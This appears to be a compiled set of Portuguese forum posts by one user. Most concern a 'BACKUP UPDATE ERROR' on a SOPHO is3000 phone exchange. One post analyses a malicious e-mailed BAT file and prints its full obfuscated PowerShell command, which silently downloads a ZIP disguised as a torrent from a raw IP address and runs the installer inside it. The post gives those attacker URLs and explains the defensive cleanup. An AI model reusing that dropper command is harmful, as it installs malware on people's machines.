Diego Junges

Boa tarde. Aqui na nossa empresa chegou também por e-mail a vários colaboradores um BAT muito parecido com esse que o colega publicou. Depois de analisar, entendi mais ou menos o que ele faz: Primeiro ele define um monte de variáveis para ofuscar os comandos. Depois ele baixa um arquivo do caminho 15.188.238.189/meupau.torrent (que no momento já não está mais disponível, mas no e-mail que veio para nossa empresa o caminho é http://18.231.164.255/lancamento2021.torrent) Está com extensão torrent, mas é um ZIP. Em seguida o bat manda descompactar e executar o instalador (bin.exe) usando o powershell em modo oculto. Tudo isso ocorre na pasta %ProgramData%\NAV-Software_-[CHAVE-CRIPTOGRAFADA]\ (ou Software-Maker[CHAVE-CRIPTOGRAFADA]) Você pode excluir essa pasta se ela estiver presente no sistema. Notei também que são adicionadas duas entradas para iniciar automaticamente junto com o Windows (verificar msconfig.exe) Eu só não consegui descobrir o que a aplicação instalada faz. Mas o comando que executa tudo no final do bat é o seguinte: %SystemRoot%\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command "& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.188.238.189/meupau.torrent' 'NAV-Software_-[CHAVE-CRIPTOGRAFADA].zip';!GOFDSJCM_GO! -s 5 ;$shell = !EXOYZB_GO!-object -com !IBGIZ_GO!;$zip = $shell.!LSZMSPI_GO!('NAV-Software_-[CHAVE-CRIPTOGRAFADA].zip');foreach($item in $zip.items()){$shell.!LSZMSPI_GO!('NAV-Software_-[CHAVE-CRIPTOGRAFADA]').copyhere($item);};!GOFDSJCM_GO! -s 5 ;renam!PRAXCMJT_GO! -path ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]\bin.~tmp') -!EXOYZB_GO!name ('NAV-Software_-[CHAVE-CRIPTOGRAFADA].~tmp');renam!PRAXCMJT_GO! -path ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]\bin!XPDHZPAZJD_GO!') -!EXOYZB_GO!name ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]!XPDHZPAZJD_GO!');remov!PRAXCMJT_GO! 'NAV-Software_-[CHAVE-CRIPTOGRAFADA].zip';!GOFDSJCM_GO! -s 5 ;!NEYRZOVD_GO! ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]\NAV-Software_-[CHAVE-CRIPTOGRAFADA]!XPDHZPAZJD_GO!')}"

Opa!!! Valeu AMAURI! Boa! A próxima vez que enfrentarmos o problema saberemos como resolver. E também fica o registro para ajudar futuros usuários com o mesmo problema. Obrigado!

Encontramos uma solução aqui. Essa mensagem (backup update error) significa que há uma falha na estrutura de arquivos da LBU. Ou seja, quando você efetua alguma alteração e tenta aplicar, a central "se perde" ao tentar registrar no journal e simplesmente não efetua o comando. E ela se perde justamente porque os arquivos estão bagunçados. A solução aqui foi pegar os arquivos da pasta de uma outra central que temos. Alteramos o arquivo de licença (.lic) e o arquivo de ramal (.pom). Depois reiniciamos a central e boa! Voltou a funcionar. Obrigado a todos pela ajuda.

Obrigado pela resposta. Infelizmente não é o BMLOCK. Na imagem abaixo veja que primeiro travei a central (BMLOCK:1;). Em seguida executei um comando de alteração (CHCASC) e não foi permitido pois o BMLOCK estava ligado. Na sequência destravei (BMLOCK:0;) e a central voltou a me retornar o erro BACKUP UPDATE ERROR quando tento efetuar alterações.

A 3090 é maior não é? Tá aí uma foto da nossa.

A central roda Windows XP. Acesso ele via remoto (MSTSC.exe) Veja essa outra imagem, é da mesma tela ... ali mostra que trata-se de um disco flash (onde tá instalado o windows e as licenças).

Opa Dilceu! Obrigado pela ajuda. Sim, é uma CPU 3000 pacote 810. Exatamente. A flash está com mais de 3 GB sobrando. Acho que está ok.

Boa tarde pessoal. Estou com esse erro na nossa SOPHO is3000. Não conseguimos inserir nenhum comando de alteração na central. Sempre retorna esse erro (BACKUP UPDATE ERROR). Alguém sabe o que pode estar causando isso? Obrigado. Diego

Boa tarde pessoal. Estou com esse erro na nossa SOPHO is3000. Não conseguimos inserir nenhum comando de alteração na central. Alguém sabe o que pode estar causando isso? Obrigado. Diego